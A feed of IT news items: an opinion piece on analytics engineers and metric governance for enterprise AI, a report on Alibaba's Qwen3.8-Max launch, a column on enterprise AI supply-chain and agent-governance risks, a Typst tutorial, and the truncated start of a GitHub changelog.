<p class="wp-block-paragraph">Confidence in AI erodes independently of model quality — and the numbers bear this out: <a href="https://resources.foundryco.com/en-us/download/state-of-the-cio-summary?utm_source=google&amp;utm_medium=ppc&amp;utm_campaign=2026-state-of-the-cio&amp;utm_feeditemid=&amp;utm_device=c&amp;utm_term=chief%20information%20officer&amp;utm_source=google&amp;utm_medium=ppc&amp;utm_campaign=2023%20State%20of%20the%20CIO&amp;utm_content=i2cp_rsch_sotc_wp&amp;hsa_cam=20572857787&amp;hsa_grp=156721913427&amp;hsa_mt=b&amp;hsa_src=g&amp;hsa_ad=674554293037&amp;hsa_acc=6730293691&amp;hsa_net=adwords&amp;hsa_kw=chief%20information%20officer&amp;hsa_tgt=aud-2237356011588:kwd-10610491&amp;hsa_ver=3&amp;gad_source=1&amp;gad_campaignid=20572857787&amp;gbraid=0AAAAABNiRv1KPIWlOSCUvKiIJyUdNH5k2&amp;gclid=Cj0KCQjw39zSBhDhARIsANammDvDzsCXmDaWYVA11T-_vj0a4gMm3Rm-YG563ROZkP8tHOE79nD3PzAaAmhbEALw_wcB">Foundry’s 2026 State of the CIO</a> study found that fewer than half of  enterprise IT leaders have established formal AI success metrics, and only 19% say AI initiatives have met or exceeded ROI goals. <a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai">McKinsey’s 2025 State of AI </a>survey found that nearly two-thirds of organizations have not yet begun scaling AI across the enterprise — and explicitly named the absence of platforms and guardrails, not model capability, as the reason.</p>



<p class="wp-block-paragraph">Popular semantic layer tools like dbt Metrics and LookML describe how metrics should be calculated but do not enforce correctness, which means there is no structural guarantee that the calculation is consistent across regions and can be traced to an authoritative source that is version-controlled on git or maintained by anyone accountable for its accuracy. With conversation and agentic AI systems embedded into the analytics workflow, the data inconsistency problem is further amplified where agents make sequential decisions, each one building on the previous output. A metric that drifts in a traditional pipeline generally produces one wrong number. The same drift in an agentic workflow can produce a chain of downstream decisions built on that wrong number, with no architectural checkpoint to catch it. This is not a model problem. It is a governance architecture problem — and it requires a specific type of data practitioner to detect and solve it.</p>



<h2 class="wp-block-heading"><a></a>Ownership and enforcement</h2>



<p class="wp-block-paragraph">The analytics engineer owns the semantic data layer: The governed, versioned, validated definitions of every metric that matters to the business. This includes standardizing metric definitions across teams and geographies, embedding validation logic directly into data pipelines, assigning ownership accountability for each metric, and ensuring AI systems consume only validated outputs. The technical signature of this role dives into the reconciliation controls that proactively detect and stall the data pipeline on failure rather than alerting after incomplete or incorrect data lands; This also includes financial reconciliation from upstream to downstream for all the data models trying all data values to financial statements and accounting ledgers, as well as jurisdiction-aware validation logic that treats regional regulatory differences as first-class properties supported by version-controlled metric definitions that create an audit trail.</p>



<p class="wp-block-paragraph">While data engineers are responsible for moving and transforming data from online to offline data warehouses, analytics engineers govern what that data means and ensure the meaning is consistent everywhere it is consumed. Data scientists, on the other hand, build machine learning models to detect anomalies, fraud or product marketing opportunities, while analytics engineers build the trusted data foundation those models depend on, making sure whether that data is accessed via manual querying, imported via dashboard tableau extracts or consumed via large language model (LLM), the end user receives consistent answers based on trusted and governed metrics. Data analysts are responsible for surfacing these metrics and building actionable dashboards and reports for leadership, while analytics engineers make sure that the data surfaced is of the utmost quality. Therefore, in the absence of this role,  oftentimes the data engineer, the data scientist and the data analyst are working around a gap that none of them owns.  </p>



<h2 class="wp-block-heading"><a></a>What happens when the role is absent</h2>



<p class="wp-block-paragraph">In the absence of this dedicated analytics engineer role, enterprises most often encounter the issue of the “which number is right” question where finance has one revenue figure, product intelligence has another and the LLM model has a third value, and none of these seem to reconcile.</p>



<p class="wp-block-paragraph">One of the common issues seen in AI projects that work in pilot and often break in production is that the pilot references clean, curated datasets and production data containing millions or even billions of records still reference the ungoverned data layer. The third and significant issue seen across enterprises is the analytics team burnout, where data engineers, scientists and analysts spend 60-70% of their time on reconciliation and firefighting rather than new pipeline creation and insight generation, because there is no governed layer to prevent these fires. The fourth issue is the hidden cost of delayed decisions, eroded executive trust and AI investments that deliver less than projected because the data foundation was never built. Most organizations recognize that they need this role only after something breaks in front of an executive, by which time the damage is already done.</p>



<h2 class="wp-block-heading"><a></a>How to identify and hire talent for this role</h2>



<p class="wp-block-paragraph">Analytics engineer, data governance engineer and metrics engineer are all applicable titles for this role. But what really matters technically is the experience with data modeling, semantic layer tooling (dbt, LookML, etc.), validation pipeline design, reconciliation architecture, data lineage and data governance. An ideal candidate is someone who thinks about data correctness as a structural constraint, not a quality preference,  where the first instinct is to stop the pipeline rather than alert and continue with bad data to land and affect stakeholder dashboards.</p>



<p class="wp-block-paragraph">While interviewing, it’s critical to ask candidates to describe a time they caught a metric inconsistency before it reached a stakeholder. The answer will reveal whether they think in governance terms or reporting terms. This role belongs in the data platform engineering or analytics infrastructure team, not in BI or reporting — it is mostly infrastructure work, not data visualization work. If the role doesn’t exist in your org chart, it exists somehow informally, usually as the senior data engineer whom everyone asks when the numbers don’t reconcile.</p>



<h2 class="wp-block-heading"><a></a>Key takeaways</h2>



<p class="wp-block-paragraph">The enterprises that are scaling faster and winning with AI in 2026 are not the ones with the best models, best-in-class AI infrastructure or large budgets. They are the ones who invested the time and effort in successfully building the governed data foundation before deploying the LLMs, and they built it because someone in the organization understood that metric governance is the fundamental data foundation that defines the nervous system of data and insights. It is an architectural property, not a configuration setting in the model, and the data practitioner who helps embed this thinking as a design strategy is the analytics engineer.</p>



<p class="wp-block-paragraph">The role is the need of the hour, the discipline is established, and the gap it fills is not going away as AI systems become more autonomous. The question for every CIO is not whether this role is needed, as the AI deployment failures already answer that. The question is whether you should hire for it before the next deployment hiccup.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alibaba takes aim at OpenAI and Anthropic with Qwen3.8-Max launch]]></title>
<description><![CDATA[Alibaba on Monday introduced Qwen3.8-Max, its largest artificial intelligence model to date, expanding its enterprise AI portfolio with an open-weight model designed for software engineering, multimodal reasoning, and other knowledge-intensive business workloads.



In a blog post announcing the ...]]></description>
<link>https://tsecurity.de/de/3701149/it-nachrichten/alibaba-takes-aim-at-openai-and-anthropic-with-qwen38-max-launch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701149/it-nachrichten/alibaba-takes-aim-at-openai-and-anthropic-with-qwen38-max-launch/</guid>
<pubDate>Mon, 03 Aug 2026 20:15:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Alibaba on Monday introduced Qwen3.8-Max, its largest artificial intelligence model to date, expanding its enterprise AI portfolio with an open-weight model designed for software engineering, multimodal reasoning, and other knowledge-intensive business workloads.</p>



<p class="wp-block-paragraph">In a <a href="https://qwen.ai/blog?id=qwen3.8" target="_blank" rel="noreferrer noopener">blog post</a> announcing the launch, Alibaba described Qwen3.8-Max as a 2.4-trillion-parameter mixture-of-experts (MoE) model that activates only about 95 billion parameters during inference.</p>



<p class="wp-block-paragraph">The company said the architecture is intended to improve inference efficiency while supporting coding, reasoning and multimodal tasks, with open-weight versions scheduled for release next week through Alibaba Cloud’s Model Studio.</p>



<p class="wp-block-paragraph">“We believe it’s one of the most powerful model available today, compatible to leading frontier AI models, second only to Fable 5,” Alibaba said in an X <a href="https://x.com/Alibaba_Qwen/status/2078759124914098291" target="_blank" rel="noreferrer noopener">post</a>.</p>



<h2 class="wp-block-heading">Benchmarks target Anthropic and OpenAI’s coding models</h2>



<p class="wp-block-paragraph">Alibaba published internal test results comparing Qwen3.8-Max against Claude Opus 4.8, Claude Fable 5, and OpenAI’s GPT-5.6 Sol on coding benchmarks, including SWE-bench Pro and a proprietary evaluation the company calls NL2Repo-Bench.</p>



<p class="wp-block-paragraph">The company said it evaluated competing models using each vendor’s own coding harness, Claude Code for Anthropic’s models and Codex for GPT-5.6 Sol, and reported the highest published score across available configurations for each rival.</p>



<p class="wp-block-paragraph">Charlie Dai, vice president and principal analyst at Forrester, said the launch signals Alibaba is closing ground on proprietary leaders, though that isn’t the full picture.</p>



<p class="wp-block-paragraph">“Alibaba is narrowing the gap, but the larger story is the rapid maturation of open-weight models,” Dai said. “Enterprises increasingly have credible alternatives to proprietary frontier models, particularly for software engineering, domain customization, sovereignty, and cost-sensitive deployments, where openness often matters as much as absolute model performance.”</p>



<h2 class="wp-block-heading">Company touts a 16-day autonomous coding run</h2>



<p class="wp-block-paragraph">Alibaba said it tested the model on three unsupervised, multi-day coding projects requiring it to take a task from an empty project folder to completion without human assistance, including one project the company said took 16 days to complete on its own.</p>



<p class="wp-block-paragraph">Alibaba also highlighted enterprise applications across legal compliance, financial analysis, engineering design, quantitative research and multimodal content creation, saying the model is intended to complete entire business workflows rather than individual AI-assisted tasks.</p>



<p class="wp-block-paragraph">Amit Jena, development manager for AI at Kanerika, said that the claim deserves more scrutiny than it has received.</p>



<p class="wp-block-paragraph">“The claim worth examining is not the parameter count. Alibaba says the model completed a software engineering project in 16 days. That sentence has been reprinted everywhere and interrogated nowhere,” Jena said. “Sixteen days of what? How many times did a human step in? Did the output survive code review?”</p>



<p class="wp-block-paragraph">Jena said the open-weight commitment itself should also be read carefully. “Publishing weights is a separate act from opening an API endpoint,” he said. “Until there is a repository, a licence and a model card, open-weight describes an intention.”</p>



<h2 class="wp-block-heading">Analysts say inference efficiency isn’t the real constraint</h2>



<p class="wp-block-paragraph">Alibaba’s mixture-of-experts architecture activates roughly 95 billion of the model’s 2.4 trillion parameters per request, a design the company says lowers inference costs.</p>



<p class="wp-block-paragraph">Dai said that tradeoff now matters more to enterprise buyers than raw model size. “Inference efficiency now matters more than raw model size for most enterprises,” he said. “Activating only a fraction of total parameters can significantly reduce serving costs and infrastructure requirements, making frontier-class performance more accessible for production deployments where scalability, latency, and economics are often bigger concerns than benchmark leadership.”</p>



<p class="wp-block-paragraph">Jena said efficiency gains matter less than an organization’s ability to actually test the model. “Efficiency stopped being the interesting question. The constraint that actually binds is evaluation throughput,” he said.</p>



<p class="wp-block-paragraph">Nitish Tyagi, senior principal analyst at Gartner, said the significance of the release lies less in the parameter count than in what it signals about competitive pressure on AI deployment costs.</p>



<p class="wp-block-paragraph">“Gartner has previously predicted that, without stronger cost controls, AI coding expenses could exceed the average developer’s salary,” Tyagi said. “The combination of open weights, a mixture-of-experts architecture, and a one-million-token context window represents a meaningful step toward making AI-augmented software development more economically viable.”</p>



<p class="wp-block-paragraph">Tyagi cautioned that enterprises need to look beyond inference costs when weighing the model for production use.</p>



<p class="wp-block-paragraph">“Many organizations outside China may be hesitant to rely on models hosted within China, leading them to deploy through hyperscalers or on-premises infrastructure, both of which introduce additional costs,” he said.</p>



<p class="wp-block-paragraph">Open-weight models also typically lack the indemnification protections that come with commercial AI vendors, he said, meaning enterprises need their own security, governance, and code-scanning controls to catch copyright and intellectual property risks before production deployment.</p>



<h2 class="wp-block-heading">What CIOs should look out for</h2>



<p class="wp-block-paragraph">Jena said the flagship model announced Monday may not be the one enterprises end up running.</p>



<p class="wp-block-paragraph">“Qwen3.8-27B, announced alongside the flagship and almost entirely ignored in coverage,” is the more deployable option for most organizations, he said, since it can run on infrastructure they own and fine-tune on their own data.</p>



<p class="wp-block-paragraph">Dai said enterprise leaders evaluating the release should prioritize transparency and total cost of ownership over headline figures. “The key question is whether Qwen3.8 delivers measurable business outcomes, enterprise-grade reliability, lower total cost of ownership, and options for digital sovereignty compared with competing models,” he said.</p>



<p class="wp-block-paragraph"><em>The article originally appeared on <a href="https://www.infoworld.com/article/4204415/alibaba-takes-aim-at-openai-and-anthropic-with-qwen3-8-max-launch.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Three scary AI security mistakes haunting enterprises]]></title>
<description><![CDATA[There is a lot of talk about the coming enterprise AI reality, in which AI finally arrives in production systems. You might not know it, but this reality—or nightmare, depending on how you handle it—is already happening.



It all starts with a “pilot,” a “prototype,” or a “side project.” Maybe s...]]></description>
<link>https://tsecurity.de/de/3700609/ai-nachrichten/three-scary-ai-security-mistakes-haunting-enterprises/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700609/ai-nachrichten/three-scary-ai-security-mistakes-haunting-enterprises/</guid>
<pubDate>Mon, 03 Aug 2026 12:13:04 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">There is a lot of talk about the coming enterprise AI reality, in which AI finally arrives in production systems. You might not know it, but this reality—or nightmare, depending on how you handle it—is already happening.</p>



<p class="wp-block-paragraph">It all starts with a “pilot,” a “prototype,” or a “side project.” Maybe someone builds an internal dashboard with an agent. The dashboard quickly becomes indispensable, and all of a sudden the experiment becomes production. Along the way, no one thought to ask the boring, inconvenient questions: What exactly was pulled from npm, PyPI, or Docker Hub? How is (or was) authentication configured? Is anyone watching for supply chain attacks against the tools and libraries the agents chose?</p>



<p class="wp-block-paragraph">And it’s not just a one-off project here or a couple of applications there. AI is enabling organizations to generate more code and ship more products and projects, more quickly, than ever before. By the time security teams get a look, the business is hooked and there’s no turning back. An actual nightmare has begun.</p>



<p class="wp-block-paragraph">There are three major problems that make the nightmare real. </p>



<h2 class="wp-block-heading">Components you never explicitly chose</h2>



<p class="wp-block-paragraph">When you ask an AI agent to build an app, it doesn’t just spit out a single script. It quietly assembles an entire ecosystem around whatever problem you’ve described to it. It pulls in a web framework, grabs a bunch of libraries, stands up databases, and then it potentially builds everything on dependencies in container images.</p>



<p class="wp-block-paragraph">From a productivity perspective, this is awesome. However, from a security standpoint, it’s worrisome, to say the least. When I’ve built apps like this myself, I couldn’t begin to tell you all of the components that were being used unless I went back and asked the agent to explain itself.</p>



<p class="wp-block-paragraph">We live in a world where anyone can publish to npm or PyPI, and we’ve seen attackers slip malicious packages into those ecosystems or compromise ones that are widely used. Some of the recent incidents have involved security and devops tools themselves pulling a compromised dependency, running it as part of CI/CD with elevated privileges, and quietly exfiltrating secrets or tampering with builds. I personally experienced this type of compromise a couple of months ago, and had to update all of my credentials in GitHub.</p>



<p class="wp-block-paragraph">Pulling unvetted code is bad; now layer AI agents on top of that. They default to whatever is easiest to discover and integrate. If a package solves a problem in front of the agent, the agent will add it. This is the old “download a random library from the Internet” problem, but now it’s on autopilot, at scale, and moving at a pace we’ve never seen before.</p>



<p class="wp-block-paragraph">To solve this problem, we must provide the agents with an innate sense of our risk tolerance, an approved components list, our desires around logging, etc. We can do this with spec files and what the industry calls constitutions. Collectively, this is called harness engineering, which we will talk more about later.</p>



<h2 class="wp-block-heading">Skills shifting from code to architecture</h2>



<p class="wp-block-paragraph">There has been a lot of hand-wringing about <a href="https://www.infoworld.com/article/4065771/why-we-need-junior-developers.html" data-type="link" data-id="https://www.infoworld.com/article/4065771/why-we-need-junior-developers.html">whether junior developers</a> will ever <a href="https://www.infoworld.com/article/4152683/what-next-for-junior-developers.html" data-type="link" data-id="https://www.infoworld.com/article/4152683/what-next-for-junior-developers.html">really learn to code</a> if AI is doing all of their coding for them.</p>



<p class="wp-block-paragraph">That’s not what worries me.</p>



<p class="wp-block-paragraph">I think it’s fine to let an agent spit out code. It’s a job they are really good at. What they are not really good at is identifying and avoiding problems in code.</p>



<p class="wp-block-paragraph">I haven’t written code in quite some time. I can, but it doesn’t make sense for me to do so. What is worth my while is noticing when an agent suggests something dumb or even dangerous (or both).</p>



<p class="wp-block-paragraph">For example, while working on a recent personal project, an agent proposed exposing a memory server on the public Internet with no authentication. The agent wired things up so smoothly that, at first glance, everything looked fine and just worked. But then I paused and asked, “Wait, how is this actually authenticating? Where’s the password, secret token, or OAuth in this flow?” Turns out it wasn’t authenticating and there was no password. If I hadn’t taken that beat—and then argued with the agent for a while—the app would have gone live with no protection.</p>



<p class="wp-block-paragraph">So, the skills issue isn’t about whether we will lose the ability to code but rather whether we have the ability to ask questions and be discerning, and whether we have the understanding to know when something doesn’t look or even feel right. Do organizations have people who know what a dangerous software pattern looks like when the agent suggests it? You need people who can recognize when an authentication flow is too permissive, when a data store should never be exposed beyond a certain boundary, and when an architecture has become such a steaming pile of technical debt that the right answer is to throw away a whole layer and rebuild it.</p>



<p class="wp-block-paragraph">You need people who know that “what works” isn’t the same as “what’s safe” or “what’s right” and who can argue back with the agent when the former doesn’t line up with the latter.</p>



<p class="wp-block-paragraph">It’s not about syntax. It’s about architecture, supply chain awareness, and the willingness to say, “We’re tearing this down and doing it right,” even when the prototype looks good on the surface. Teach your AI-assisted coders basic security principles, basic architectural patterns. The AI will teach them the more advanced stuff, as long as they keep asking questions.</p>



<h2 class="wp-block-heading">Agents with no harness</h2>



<p class="wp-block-paragraph">The third problem is that we’ve unleashed some very capable agents into our development workflows without treating them like first-class actors that need governance.</p>



<p class="wp-block-paragraph">Many organizations are wiring AI assistants into a repo or IDE and letting them scaffold projects and pipelines. Maybe they bolt on a security scanner and declare “AI enablement.” That’s not a governance model, that’s optimism (and not even cautious optimism).</p>



<p class="wp-block-paragraph">Indeed, a code-generating agent with broad access to your repos, your CI/CD pipeline, and your artifact registries is effectively a hyper-productive and not-very-well-trained junior developer with access to the Internet and no ingrained sense of organizational policies. It can introduce new tools, new dependencies, and new patterns faster than your review processes can handle.</p>



<p class="wp-block-paragraph">In my personal projects, I’ve started to think of this as what AI coders call a harness-engineering problem. For every agent that’s responsible for building or wiring code, I try to put other agents in the loop that are responsible for tearing it down, at least conceptually. For example, one agent focuses on security and looks for obvious vulnerabilities and bad practices. Another looks at architecture and points out when the app design is veering into unmaintainable territory. A third looks at performance and reliability issues, which are themselves a kind of security concern when you think about things like denial of service and resource exhaustion. Pair this with constitutions that give the agents first principles on architecture, security, and design, and this is no longer vibe coding, it’s harness engineering at scale for all of your projects.</p>



<p class="wp-block-paragraph">What I am doing isn’t perfect; there is no perfect in this space, because these are non-deterministic, statistical tools. But, many organizations aren’t even doing this. In effect, their agents are freelancing. They’re vibe coding. They’re not constrained to trusted registries or hardened base images. They’re not required to log their decisions in a way that security can audit. No one owns the harness, and that means a lot of implementation decisions have fully shifted from humans to systems that no one is really watching.</p>



<h2 class="wp-block-heading">New problems require new thinking</h2>



<p class="wp-block-paragraph">The enterprise AI nightmare is not a killer robot; it’s the erosion of our ability to see and control what’s running in our own environments at the exact moment our velocity is exploding. The danger is in ceding your agency. It’s in shipping applications that internal and external customers love—and don’t want to give up—but inherently aren’t safe. Right now, someone in your organization is using AI to build a capable app, pulling in who knows what from who knows where and adding it to your infrastructure.</p>



<p class="wp-block-paragraph">The good news is that these problems are identifiable. They are also solvable, although it will take a new form of thinking than what solved problems in the past. You must think statistically, and declare constitutions with first principles. You can standardize trusted stacks and registries. You can retrain people around architectural security rather than just “secure coding.” You can start treating agent harnesses as systems that deserve design reviews and edits.</p>



<p class="wp-block-paragraph">But, none of that can happen until the enterprise is willing to admit that the nightmare is already here.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Get started with the Typst programming language for documents]]></title>
<description><![CDATA[When we think of documents, or documentation, they tend to fall into two circles. First are business documents, typically composed with an office application like Microsoft Word or Google Docs. Second is project documentation, often created semi-automatically from a project using an app like Sphi...]]></description>
<link>https://tsecurity.de/de/3700611/ai-nachrichten/get-started-with-the-typst-programming-language-for-documents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700611/ai-nachrichten/get-started-with-the-typst-programming-language-for-documents/</guid>
<pubDate>Mon, 03 Aug 2026 12:13:04 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When we think of documents, or documentation, they tend to fall into two circles. First are business documents, typically composed with an office application like Microsoft Word or Google Docs. Second is project documentation, often created semi-automatically from a project using an app like Sphinx or Pandoc.</p>



<p class="wp-block-paragraph">But there’s a third circle, one that can overlap the other two. These are documents produced by a typesetting language—a combination of markup and programming language used to produce books, textbooks, academic journals, scientific papers, technical manuals, and other documents where the formatting and layout is crucial.</p>



<p class="wp-block-paragraph">A typesetting language allows you to create a handy, human-readable document that serves both as a single source of truth and as a foundation for outputting to print, web, e-book, and other formats. Over the last few years, an open-source project has shaped up to be a powerful choice for meeting all of those needs: <a href="https://typst.app/">Typst</a> (pronounced “typist”).</p>



<h2 class="wp-block-heading">TeX, LaTex, and now Typst</h2>



<p class="wp-block-paragraph">For decades, the preeminent typesetting language was <a href="https://en.wikipedia.org/wiki/TeX">TeX</a>, better known in its more recent incarnation <a href="https://en.wikipedia.org/wiki/LaTeX">LaTeX</a>. TeX was originally created by <a href="https://en.wikipedia.org/wiki/Donald_Knuth" data-type="link" data-id="https://en.wikipedia.org/wiki/Donald_Knuth">Donald Knuth</a> in 1978, and LaTex followed in 1984.</p>



<p class="wp-block-paragraph">TeX and LaTeX have broad adoption and they’re almost universally supported and understood. But they have two big, long-standing problems. The first is they’re old. They were created for an entirely different world of computing, and their age shows in cumbersome syntax and management. The second is the general complexity of using their language. In fact, LaTex was originally created as a way to make using TeX less complicated, but the underlying complexity of TeX was impossible to hide. </p>



<p class="wp-block-paragraph">Typst was created as a clean-slate solution to the problems and limitations of TeX and LaTeX. It shares many of the same ideas. For instance, Typst lets you typeset mathematical formulas using a syntax similar to the syntax used to express mathematical formulas in a programming language. But it does not try to be compatible with TeX syntax (although you can use third-party tools to convert TeX formulas to Typst.)</p>



<h2 class="wp-block-heading">Typst CLI, web app, and VS Code extension</h2>



<p class="wp-block-paragraph">Typst is available as a standalone command-line program (the open-source <a href="https://typst.app/open-source/" data-type="link" data-id="https://typst.app/open-source/">Typst compiler</a>), as a hosted web playground (the <a href="https://typst.app/" data-type="link" data-id="https://typst.app/">Typst app</a>, shown below), or as an add-on for Visual Studio Code (<a href="https://marketplace.visualstudio.com/items?itemName=myriad-dreamin.tinymist" data-type="link" data-id="https://marketplace.visualstudio.com/items?itemName=myriad-dreamin.tinymist">Tinymist Typst</a> being the most popular). The web playground gives you the fastest possible hands-on experience: all you need to do is start typing, and you’ll see a live preview. (The Tinymist add-on for VS Code also displays previews.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/image_808.png?w=1024" alt="Typst web playground." class="wp-image-4200172" width="1024" height="638" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The web playground for Typst. All content is previewed live as you type. The current export mode, PDF, preserves positioning and formatting exactly.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">For most basic documents, Typst doesn’t require much extra syntax. You can just type Markdown-flavored text, and have that formatted as you’d expect. Underscores and asterisks can be used for emphasis or bold; section heads can be set with equals signs at the start of a line; and so on.</p>



<p class="wp-block-paragraph">Typst’s programming capabilities come into the picture when you want to start modifying the document’s presentation beyond its defaults. For instance, if you wanted to set the page size, margins, fonts, and paragraph formatting, you’d use declarations like these:</p>



<pre class="wp-block-code"><code><span class="hljs-selector-id">#set</span> <span class="hljs-selector-tag">page</span>(<span class="hljs-attribute">width</span>:<span class="hljs-number">5.25in</span>, <span class="hljs-attribute">height</span>:<span class="hljs-number">8in</span>, <span class="hljs-attribute">margin</span>: .<span class="hljs-number">5in</span>)
<span class="hljs-selector-id">#set</span> <span class="hljs-selector-tag">text</span>(<span class="hljs-attribute">size</span>: <span class="hljs-number">11pt</span>, <span class="hljs-attribute">font</span>: <span class="hljs-string">"Libre Baskerville"</span>)
<span class="hljs-selector-id">#set</span> <span class="hljs-selector-tag">par</span>(<span class="hljs-attribute">first-line-indent</span>: <span class="hljs-number">1.75em</span>,<span class="hljs-attribute">justify</span>: true)
</code></pre>



<p class="wp-block-paragraph"><code>#set</code> commands make changes from that point forward in the document. If you place these at the top of your document, they affect everything below it. But you could use other <code>#set</code> commands later to override those changes — for instance, if you switch from one text column to two.</p>



<h2 class="wp-block-heading">Typst code mode</h2>



<p class="wp-block-paragraph">The hash (<code>#</code>) in Typst (except when escaped with a slash) is used to signal a switch from regular text (markup mode) to Typst commands (code mode). Those commands can span multiple lines, until the Typst code block or expression is concluded:</p>



<pre class="wp-block-code"><code>This is regular text.

<span class="hljs-selector-id">#let</span> inline_image(img) = {
  box(<span class="hljs-attribute">height</span>: <span class="hljs-number">8em</span>, place(top+left, dx: <span class="hljs-number">5pt</span>, square(
      image(<span class="hljs-selector-tag">img</span>, <span class="hljs-attribute">height</span>:<span class="hljs-number">100%</span>, fit:<span class="hljs-string">"cover"</span>)
  )))
}

This is regular text again.</code></pre>



<p class="wp-block-paragraph">Here, we’ve used <code>#let</code> to define a function that takes one argument (the name of an image), and inserted it into an inline box. The curly braces indicate the body of the function, but individual lines end in a line break as in Python, not in a semicolon as in JavaScript.</p>



<p class="wp-block-paragraph">Typst exports to various formats — PDF, images, and HTML — although it’s optimized for the static layouts of PDF and images. Some kinds of formatting don’t render by default in HTML mode, if only because Typst can’t make reliable guarantees about how to do that (e.g., page headers and footers, which don’t really exist in HTML). What you <em>can</em> do is determine what the current export target is, via the <code>target()</code> function, and take action based on that:</p>



<pre class="wp-block-code"><code>#let sectionbreak(txt) = {
  context(
    <span class="hljs-keyword">if</span> target()==<span class="hljs-string">"html"</span> {
      html.elem(<span class="hljs-string">"div"</span>, attrs:(<span class="hljs-class"><span class="hljs-keyword">class</span>:<span class="hljs-type">"section-break"))[]</span></span>
      <span class="hljs-keyword">return</span>
    }
    <span class="hljs-keyword">else</span> {
    divider()
  })
}
</code></pre>



<p class="wp-block-paragraph">In this example, we’re creating a <code>sectionbreak()</code> function that has two behaviors. For HTML targets, it inserts an empty <code>div</code> tag with a CSS class that we could style with a style sheet. For all other targets, it defaults to the built-in <code>divider()</code> function.</p>



<p class="wp-block-paragraph">All of the document’s attributes are available in Typst code. The <a href="https://typst.app/docs/reference/introspection/query/"><code>query</code></a> function uses a syntax similar to JavaScript’s element querying system:</p>



<pre class="wp-block-code"><code>query(
    <span class="hljs-name">heading</span>.where(
      <span class="hljs-name">level</span>: <span class="hljs-number">1</span>,
    )
)
</code></pre>



<p class="wp-block-paragraph">This would return all document headings at level 1, then let you iterate over them, manipulate their contents, perform other introspection, and so on.</p>



<p class="wp-block-paragraph">Typst also has its own package manager and <a href="https://typst.app/universe/">package directory</a>. Packages do not need to be formally installed from the directory; you can simply reference them in your Typst program with an <code>import</code> statement, and they’ll be included.</p>



<h2 class="wp-block-heading">Typst math mode</h2>



<p class="wp-block-paragraph">Typst’s math blocks are patterned after TeX, but aren’t a drop-in replacement for TeX. That said, anyone with a little programming experience should be able to pick up how Typst’s math mode works.</p>



<p class="wp-block-paragraph">Math formulas are set aside from text by dollar signs:</p>



<pre class="wp-block-code"><code>$ sum_(k=<span class="hljs-number">1</span>)^<span class="hljs-built_in">n</span> k = (<span class="hljs-built_in">n</span>(<span class="hljs-comment">n+1</span>)) / <span class="hljs-number">2</span> $
</code></pre>



<p class="wp-block-paragraph">This block renders to the equation shown in the above screenshot. As with the hash, the dollar sign can be escaped with a slash if you need it in text. </p>



<p class="wp-block-paragraph">If you have a great deal of existing material composed in TeX, you can use a third-party tool to translate that TeX to Typst. The <a href="https://typst.app/universe/package/mitex/">MiTex</a> package can perform this inline for individual formulas or entire TeX documents.</p>



<h2 class="wp-block-heading">Automating Typst</h2>



<p class="wp-block-paragraph">The Typst language and ecosystem are still relatively new, and the language has limitations. Some are just a matter of features needing further development. Others, like the strict limitations on paths for imports or reading data, are by design.</p>



<p class="wp-block-paragraph">One way to get around limitations in Typst is to wrap it in another programming language. Python is an easy choice, and the <a href="https://pypi.org/project/typst/"><code>typst</code></a> Python library provides a high-level way to drive the Typst compiler. This lets you orchestrate complex workflows with multiple files, read data outside of the project root, or perform Typst queries to read document data.</p>



<p class="wp-block-paragraph">In time, some of what you might need to shim up this way may become native features. The community around Typst is already quite active (over a thousand packages are available for it), and new releases come regularly.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why vertical AI is the defining opportunity for enterprise right now]]></title>
<description><![CDATA[The race to deploy horizontal AI tools may be leaving real competitive advantage on the table.]]></description>
<link>https://tsecurity.de/de/3700495/it-nachrichten/why-vertical-ai-is-the-defining-opportunity-for-enterprise-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700495/it-nachrichten/why-vertical-ai-is-the-defining-opportunity-for-enterprise-right-now/</guid>
<pubDate>Mon, 03 Aug 2026 12:02:01 +0200</pubDate>
<content:encoded><![CDATA[The race to deploy horizontal AI tools may be leaving real competitive advantage on the table.]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: v17.2.5]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Breaking Changes

Tool examples embedded in tool descriptions now always render in Python call syntax, and the exampleDialect option has been removed from AppendOnlyContextManager build options.
Updated normalizeTools to accept a NormalizeToolsOptions configuration object ...]]></description>
<link>https://tsecurity.de/de/3700321/tools/github-v1725/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700321/tools/github-v1725/</guid>
<pubDate>Mon, 03 Aug 2026 10:23:49 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h2>@oh-my-pi/pi-agent-core</h2>
<h3>Breaking Changes</h3>
